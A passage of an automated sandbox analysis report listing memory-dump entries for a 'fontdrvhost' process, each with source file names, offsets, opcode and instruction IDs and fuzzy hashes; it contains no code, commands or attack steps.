                • Instruction Fuzzy Hash: AE115870E1891D8FDBA4EB98C8557FDBBB1FB58301F0141B9801DE32A1DAB45A809F40
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 59797f959d5328af4814bf2cce2a1763409fdf00164dd26eaaa0c26753446855
                • Instruction ID: 0ff53dfa4b5392a60554ea05f14c2a3c5fad428ce077a6908d406e265336207a
                • Opcode Fuzzy Hash: 59797f959d5328af4814bf2cce2a1763409fdf00164dd26eaaa0c26753446855
                • Instruction Fuzzy Hash: 89017131E0A64E4FE769EBB488986B97BE0EF19304F4245B6D408C70B6EA74E644D701
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA9A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba9a000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fb8fbbfb506baea2d39d91105de56a70485538012b121c5f90c5734eba7f36be
                • Instruction ID: e9252876b432374f7ba3762eb4b6e4b121595008855a5a0c49e7d0df10f37695
                • Opcode Fuzzy Hash: fb8fbbfb506baea2d39d91105de56a70485538012b121c5f90c5734eba7f36be
                • Instruction Fuzzy Hash: 1801F730A0E24E4FE766EBB8C9691A97FE0EF19300F4648F7D408C70B2EA78A5449701
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6a3d2770167db0d3907157cd452b8c49a519a5335ce9bde7670ac822c0014b29
                • Instruction ID: 6e7e9ded61f29c7777abd9c12732c1b47f01bedeb2cc78ed32cc3de1399e12fb
                • Opcode Fuzzy Hash: 6a3d2770167db0d3907157cd452b8c49a519a5335ce9bde7670ac822c0014b29
                • Instruction Fuzzy Hash: 13018F34E0990E8EEB51EF68C4585B97BF0FF58302F424976D41DC31A5EB74A2809B40
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b02ece0885a9efb688647f1cc9ef384dc423f50733ec8e720f5fae16e001e34b
                • Instruction ID: a2e095baa1b4cb98f8c45e05114387de8241bbcceef954a208b1eab9946f1e67
                • Opcode Fuzzy Hash: b02ece0885a9efb688647f1cc9ef384dc423f50733ec8e720f5fae16e001e34b
                • Instruction Fuzzy Hash: 6601D471A0E78E4FE766E7B488695A97BE0EF4A300F0604F6C40CCB0B6DA78A558C701
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 676d0448fcc460a53ced18b9a60f8bb27b38bb6ea423c1033fea6d2e930d21fe
                • Instruction ID: e6f00e383380108189b9eb72eedd375c7bd84a27cbf84fc51466ca1fa3e63e4d
                • Opcode Fuzzy Hash: 676d0448fcc460a53ced18b9a60f8bb27b38bb6ea423c1033fea6d2e930d21fe
                • Instruction Fuzzy Hash: E6018430A0550E9FDB98EF64C0646BA77E1EF68305F51447DD40EC21E4CA75A640DB40
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1fd971088d303de723bd66b583a799a6a8671400a4711d6b37c943ba6f1c603b
                • Instruction ID: bfaf6f38cae9627c49f2030598b91a60460cf020a68d80b5bc9ec417e002f885
                • Opcode Fuzzy Hash: 1fd971088d303de723bd66b583a799a6a8671400a4711d6b37c943ba6f1c603b
                • Instruction Fuzzy Hash: F9018130A19A0E8EEB6CEBA4C4686B973A0FF18305F11487ED41EC21E5DF75A690CA00
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8a335c37787d06d1bbb1b6352e5b939f2338b2407983bd1363981b8b6826258d
                • Instruction ID: 9a00422c8ad61ebd6a37fe114c362ac4b7c2f84e4a6e3610191bc6b3e131934d
                • Opcode Fuzzy Hash: 8a335c37787d06d1bbb1b6352e5b939f2338b2407983bd1363981b8b6826258d
                • Instruction Fuzzy Hash: EC018130A1960E8BEB6CEFA4C4696B973A0FF18305F5188BED41EC21E5DF75A654CA00
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c9f4473ff746decdbc564d63ea2c0a97c832542c8b3be2c35ebfc061b74ec740
                • Instruction ID: 62d840432e775416bbacc4e058181493dbea3277edd5a537801c588850add6ec
                • Opcode Fuzzy Hash: c9f4473ff746decdbc564d63ea2c0a97c832542c8b3be2c35ebfc061b74ec740
                • Instruction Fuzzy Hash: 5701D630A0A68E8FEBA9DF1484652B93BA0EF65304F51007AD40CC61E1DAB5A654D740
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA9A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba9a000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3a4bebc5b06982afd3f4aed6f250d1d105e4fe3c7b391bb4467908279ded7173
                • Instruction ID: 141e0d8b269af470b312446cdc5506098b127466bc347bc3d02ba74ff98656ca
                • Opcode Fuzzy Hash: 3a4bebc5b06982afd3f4aed6f250d1d105e4fe3c7b391bb4467908279ded7173
                • Instruction Fuzzy Hash: 77F02825A0F38E4FE322EB7899B11E97FA09F82225F0A45F7C088CA4E3D96C5449D310
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e212c834141826b5b760004d2927656fa899d8de6061c186b9d0210ddcc5e67d
                • Instruction ID: f8a87545a280731f64c7493827355d2205e25791e66f67120472f65ddff92a35
                • Opcode Fuzzy Hash: e212c834141826b5b760004d2927656fa899d8de6061c186b9d0210ddcc5e67d
                • Instruction Fuzzy Hash: 22F02D71E0F68E46FBA49F6448352B97AD1FF15304F0501BDF45CC21F2DEB525548251
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8862a6360a5c801d5593583b9d8091b25c523ff9e7042875dd7ae564e1a0061b
                • Instruction ID: f18820b5b88fc432eac32052fa1c7ce79519c296ce661f6be8a90c370717b5fd
                • Opcode Fuzzy Hash: 8862a6360a5c801d5593583b9d8091b25c523ff9e7042875dd7ae564e1a0061b
                • Instruction Fuzzy Hash: 9B01B130E0950E8FEB74DB44C860AEEB7B1EB50715F008279C41A972A4CE746A49EF88
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cd7fa8c788c2f216bd6b072e09acece21ce301150b492378e47e7ad55931001f
                • Instruction ID: d2f37e2a72f1ea2cc3706f318ad5e3c614218685defc43076d45721ea19336d4
                • Opcode Fuzzy Hash: cd7fa8c788c2f216bd6b072e09acece21ce301150b492378e47e7ad55931001f
                • Instruction Fuzzy Hash: CAF0C23190E38E8FDB699FA088651F93F60AF16204F4644FBE448C60E2DA78A908D701
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA9A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba9a000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5c1782aaffd6152c93e65dba499fb07e1fb604e184d571e6b8da3a53efbeb59a
                • Instruction ID: e928d6fd23f20cac5dd52965de4221632eea7009c2d23580eb768c88dc3c30e8
                • Opcode Fuzzy Hash: 5c1782aaffd6152c93e65dba499fb07e1fb604e184d571e6b8da3a53efbeb59a
                • Instruction Fuzzy Hash: 8501E470A0562D8FEF60DF84C8A47ECB7F1FB18701F11022AE409E7290DBB86A44DB40
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 76fb960cc36176aabc98e6ba92865ee53cfac1b96e193a0b6a131d18b1b77ef5
                • Instruction ID: e5eac3b6e5bbd01919b99af0d7e5f1436d675dec46152ab42c4f9b444c3d9610
                • Opcode Fuzzy Hash: 76fb960cc36176aabc98e6ba92865ee53cfac1b96e193a0b6a131d18b1b77ef5
                • Instruction Fuzzy Hash: 05F0243190A78E8BEB6C9FA084641F93BA0FF15300F4240BAE418C11E5DF78E5448700
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eac47bdc71e758d366e5fe40b93aa0017f0ca2d14ff692d2d4873676f49881aa
                • Instruction ID: 6fe5e56d6421a49751de52e2e459ba748abdee4e49a89d1c69e3d184c1ae1e64
                • Opcode Fuzzy Hash: eac47bdc71e758d366e5fe40b93aa0017f0ca2d14ff692d2d4873676f49881aa
                • Instruction Fuzzy Hash: D5F0D030A0961DCBE7B8DF94CCA47E972A1FB55320F5142B5C45DD22E1DFB86A88AB00
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2f3489c0ae1c361e77cb0ceec07d6095f4b94c4f419a2944a5ad6b4956fd0a8a
                • Instruction ID: d39502076a521db1b214e1270e031b6127225ba5647be3a9bcda201f854cb93a
                • Opcode Fuzzy Hash: 2f3489c0ae1c361e77cb0ceec07d6095f4b94c4f419a2944a5ad6b4956fd0a8a
                • Instruction Fuzzy Hash: 49F05E30E0590E8FEB60DB48CC50FAEB3B1EB94315F008266D409D3294CE786A85CF84
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 94bd504af1a47655b9ab914b532e4a50f3bf3bc7f44986f610f89b2ce44f040d
                • Instruction ID: ca31a785ca8f38eb3ca9748132c07d5b69441707168309f58e1ec72df35bc00f
                • Opcode Fuzzy Hash: 94bd504af1a47655b9ab914b532e4a50f3bf3bc7f44986f610f89b2ce44f040d
                • Instruction Fuzzy Hash: FEF0C031A0851DCBEB64EF50CC947E973B1FB54311F5145B9C40DD71A1DFB86A889B40
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 129fbaf3d633461b3c3e35fb0a0bf4e79fb37ba496557c06830bdddc4011c84c
                • Instruction ID: 407513d3895e25536d10f3de1419cf7ddd7b0404abf57af5b0a620ae6311093a
                • Opcode Fuzzy Hash: 129fbaf3d633461b3c3e35fb0a0bf4e79fb37ba496557c06830bdddc4011c84c
                • Instruction Fuzzy Hash: 21D04260E1991E8FEB64EBE8C4A96ACAEB1EF45304F514039D519B21A2DE7C65409B10
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba90000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 455f056184316a41b4b9beb1bfd79aa2487955c1a3eb9b535dde6bce44315c3a
                • Instruction ID: b75f73f818bd2ff948d58dca33a1ca8397354ef48cfb816912a1e63a274461e0
                • Opcode Fuzzy Hash: 455f056184316a41b4b9beb1bfd79aa2487955c1a3eb9b535dde6bce44315c3a
                • Instruction Fuzzy Hash: 88C08C31D2264E8FEB64EF90AC214FDB370FF48204F401172E42CE3092DFB026108680
                Strings
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID: "$$$-$/$[$]$}
                • API String ID: 0-3346241342
                • Opcode ID: 1a399733918b7f0d9a599c436ffdf12fe3c162113a21e39a5aa94e12d49ccf37
                • Instruction ID: 947dc949b93863bba0132a3abe68d7ef3284c5de0d07dd5bed72536b7329c5bc
                • Opcode Fuzzy Hash: 1a399733918b7f0d9a599c436ffdf12fe3c162113a21e39a5aa94e12d49ccf37
                • Instruction Fuzzy Hash: 6191C470E0962DCFDB68DF94C8A47FDB7B2AB59301F1141AAD00DA7291CB786A84DF50
                Strings
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID: %$,$-$/${
                • API String ID: 0-3562811445
                • Opcode ID: 93c57897778952066de2fd17d0b5eb3575932481b596b54c9bdb0af07ce58855
                • Instruction ID: df42a3ecb139c8aa082589e57ec3ac01fca2372c3230ba4edba3b5b5c2e22089
                • Opcode Fuzzy Hash: 93c57897778952066de2fd17d0b5eb3575932481b596b54c9bdb0af07ce58855
                • Instruction Fuzzy Hash: FB21F670A0522E8BEF689F90D8A47FDB7B2AB55311F15417AD00E96290CB786A84DB10
                Strings
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA9A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba9a000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID: '$<$H$[$\
                • API String ID: 0-978586023
                • Opcode ID: 70811a1f5260896d409af6c46a8f5f8b3ad5adb04a426629b3f03a87309b0cde
                • Instruction ID: 1fe4a8a673d781847151773c96bce28a552e42cbe3e78c97c82c9e4cea7d03cb
                • Opcode Fuzzy Hash: 70811a1f5260896d409af6c46a8f5f8b3ad5adb04a426629b3f03a87309b0cde
                • Instruction Fuzzy Hash: 1A210B70E0926ECFDF78CF40D8607A9B7B1BB55311F2141BEC409A62A1DB786A88DF40
                Strings
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BA9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA9A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9ba9a000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID: $=$I$^
                • API String ID: 0-3128807046
                • Opcode ID: 7ea7f60a9ecef5186b4536b364222cda4a09a790cf6a85b2a659cc86cae1598f
                • Instruction ID: 01caaefc6bf5e471ebde0f53282a7707f3542d665be2942ae776a4d5aeec76c4
                • Opcode Fuzzy Hash: 7ea7f60a9ecef5186b4536b364222cda4a09a790cf6a85b2a659cc86cae1598f
                • Instruction Fuzzy Hash: BB51B570E0962E8FDBA8DF54C8A57A9B7B1FF54301F1141EAD40EA62A1CB746E84DF40
                Strings
                Memory Dump Source
                • Source File: 0000001C.00000002.1881144968.00007FFD9BAA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA1000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_28_2_7ffd9baa1000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID: %$-$/${
                • API String ID: 0-2415596918
                • Opcode ID: 3b87ecb8a63f30ec8abd7102f8f10bad35101881e384fa859010cdeece5833f4
                • Instruction ID: af6bf083ecdf03c3c01f59560fccfd28d12c9f2245217956e6f6f9911b9b2d79
                • Opcode Fuzzy Hash: 3b87ecb8a63f30ec8abd7102f8f10bad35101881e384fa859010cdeece5833f4
                • Instruction Fuzzy Hash: C521F370E0522E8BDF689F91D8A47FDB7B2FB55301F14417AD00EAB290CB786A84DB10
                Memory Dump Source
                • Source File: 0000001E.00000002.1888257985.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_30_2_7ffd9bab0000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 880b9fca9694c172f138838ea0295c9a5619f256aa8ba569a2a77b9f07afc132
                • Instruction ID: 799b391028f33a64bd8c0ecc0b43b59022be6f590ee676bce457d457b0c38a27
                • Opcode Fuzzy Hash: 880b9fca9694c172f138838ea0295c9a5619f256aa8ba569a2a77b9f07afc132
                • Instruction Fuzzy Hash: 92A1A471A1994E8FEB58EB68C8657AD7BE1FF5A314F5002BAD01DC72D6CFB428418B40
                Memory Dump Source
                • Source File: 0000001E.00000002.1888257985.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_30_2_7ffd9bab0000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d5c127599ddf1aa2da6915180fd9e824d16d5be9cf7ac3a25cc03d7238223b76
                • Instruction ID: 02d665118c7ec2ee6114105fe1d2d7dabada75b7d1f0ea4cb8624e3263d611df
                • Opcode Fuzzy Hash: d5c127599ddf1aa2da6915180fd9e824d16d5be9cf7ac3a25cc03d7238223b76
                • Instruction Fuzzy Hash: BD81D031B2DA594FDB58DF5888605A977E2FFE8300F15417AE46DC32A6DE74AD02CB80
                Memory Dump Source
                • Source File: 0000001E.00000002.1888257985.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_30_2_7ffd9bab0000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 48730fee80ade19eee46e1ec246a4be5e51ae4d50714cae3fdf5861df5560bdb
                • Instruction ID: bdaf7f84addd366b6c84cb062a526fb48dfd4b435503395319b2c25a6915576e
                • Opcode Fuzzy Hash: 48730fee80ade19eee46e1ec246a4be5e51ae4d50714cae3fdf5861df5560bdb
                • Instruction Fuzzy Hash: BB51D031B18B594FDB58DF5888645BA77E2FFA8310F15417EE46AC7295CE74A802CB80
                Memory Dump Source
                • Source File: 0000001E.00000002.1888257985.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_30_2_7ffd9bab0000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 06691c17b9a30fe94bcabba2c6399cebbe0821efc65769af1387c91a0c859b0a
                • Instruction ID: 00e460b4d4be4f13e174edbc06a5eda24485b814cea683f099e9f16176be94dc
                • Opcode Fuzzy Hash: 06691c17b9a30fe94bcabba2c6399cebbe0821efc65769af1387c91a0c859b0a
                • Instruction Fuzzy Hash: 52513070E1991D8FDB94EBA8C865ABDB7F1FF58301F50017AD00DE3291DE7569818B40
                Memory Dump Source
                • Source File: 0000001E.00000002.1888257985.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_30_2_7ffd9bab0000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ce00a5858e75f6368b2e4a6cd571e7f3516af70d9459d9f32840e563d8d1767f
                • Instruction ID: 93e173c5a197e6272d392e01de5c29e488e4d9d9206073f679edadc483e9e6b4
                • Opcode Fuzzy Hash: ce00a5858e75f6368b2e4a6cd571e7f3516af70d9459d9f32840e563d8d1767f
                • Instruction Fuzzy Hash: 12513971E0A62E8FEB64EB94C4646EDBBF1EF58300F51417AD019E72A1DB786A44CF40
                Memory Dump Source
                • Source File: 0000001E.00000002.1888257985.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_30_2_7ffd9bab0000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1fe93c1961959c46355b1de6ebdc3c571622203de17c1350178d82fab603e974
                • Instruction ID: 23a7433c678ef3f33eceb33eb1add6df07aa724ff598291e785a4e597ebf4da5
                • Opcode Fuzzy Hash: 1fe93c1961959c46355b1de6ebdc3c571622203de17c1350178d82fab603e974
                • Instruction Fuzzy Hash: 5E417731B0E69D0FE765E7B898651B8BBE0EF86310F0545FBE05CC71A2DE68A9018741
                Memory Dump Source
                • Source File: 0000001E.00000002.1888257985.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_30_2_7ffd9bab0000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c05b0c7707191b0139d71e792d756c535c98540ed161fcf65b4d515d2ddfa99c
                • Instruction ID: 8d865f517dd504d82b08c82e3248fe5b10f279413de1f5287a33c3d1764468d1
                • Opcode Fuzzy Hash: c05b0c7707191b0139d71e792d756c535c98540ed161fcf65b4d515d2ddfa99c
                • Instruction Fuzzy Hash: A031C330E2955E4FEBA8EBA4D4646B977E0FF25304F01057ED02ED21E5DE6565418B40
                Memory Dump Source
                • Source File: 0000001E.00000002.1888257985.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_30_2_7ffd9bab0000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 688b97b79eaf511c6e4355a38288936234bba9bb30405821510b5a1462e147b2
                • Instruction ID: ab9548884b7cdd17bd1fe37f1c7c0f0a352e0799cae20f506c3f9a5f0c6df1a9
                • Opcode Fuzzy Hash: 688b97b79eaf511c6e4355a38288936234bba9bb30405821510b5a1462e147b2
                • Instruction Fuzzy Hash: 9221D131A4E29E8FD742ABB4C8685A93BF0FF4A311F0644FBD458CB072DA789585CB10
                Memory Dump Source
                • Source File: 0000001E.00000002.1888257985.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_30_2_7ffd9bab0000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7dbfdece9ba37b44b9456ce462adbce30ab1cb43277309028f7763608c7b8bf2
                • Instruction ID: 6fcd2e366a07865c4b0c97bb3633a14c3bcab3d43514fb9eb1d6a93f1eb63a1d
                • Opcode Fuzzy Hash: 7dbfdece9ba37b44b9456ce462adbce30ab1cb43277309028f7763608c7b8bf2
                • Instruction Fuzzy Hash: 11212F31E5A62D8EEB74DB94D8607FCB6B4EF55301F4151BAC01D921A1DEB82A84CF00
                Memory Dump Source
                • Source File: 0000001E.00000002.1888257985.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_30_2_7ffd9bab0000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 62cbe42d67b751cc94d645c8ffaab8a16113bb66dad86396a6649e2bd385b83a
                • Instruction ID: c14b3a4c94adf07fdb661011c64b640f357f3969cac3ff365ede18eb596a6224
                • Opcode Fuzzy Hash: 62cbe42d67b751cc94d645c8ffaab8a16113bb66dad86396a6649e2bd385b83a
                • Instruction Fuzzy Hash: 1211C471E1961E4FE7A0EBA8C8695FD7BE0FF58700F4149BAD42CC70A6EE74A5408B40
                Memory Dump Source
                • Source File: 0000001E.00000002.1888257985.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_30_2_7ffd9bab0000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ad276900358cd8ab975ec8ec6e13f6cf9d64a64073c2fa96a0e6af83d5085981
                • Instruction ID: 88ee20d3c5d62778326957d1489e1afb781c0e60f32c75c171de4f0a77f755e2
                • Opcode Fuzzy Hash: ad276900358cd8ab975ec8ec6e13f6cf9d64a64073c2fa96a0e6af83d5085981
                • Instruction Fuzzy Hash: 4B115E31E1962D8AEB74EFC0E8657FDB6A0FF14311F51427AC02ED21A1DEB826489F40
                Memory Dump Source
                • Source File: 0000001E.00000002.1888257985.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_30_2_7ffd9bab0000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 04732005e043c221efd64af34a39f4d9ccce4d62e883413dca14988f5a40cace
                • Instruction ID: 90633a7501241b9d434f415e0333ab2001c62c93d492a87c3f909ff990cbb0ea
                • Opcode Fuzzy Hash: 04732005e043c221efd64af34a39f4d9ccce4d62e883413dca14988f5a40cace
                • Instruction Fuzzy Hash: 1A112E31E5A52D8EEB68DB90E8606FCB774FB55310F41517AC02E931A1DEB86A448F40
                Memory Dump Source
                • Source File: 0000001E.00000002.1888257985.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_30_2_7ffd9bab0000_fontdrvhost.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e3e9ceceb40b2833d3fb20c69b15354699dea994f11306bd0996d12cb35f7704
                • Instruction ID: 91d21dd7853742205c0fb618b48fa67b5bf3b4052a25a581801e74b06b01da7a
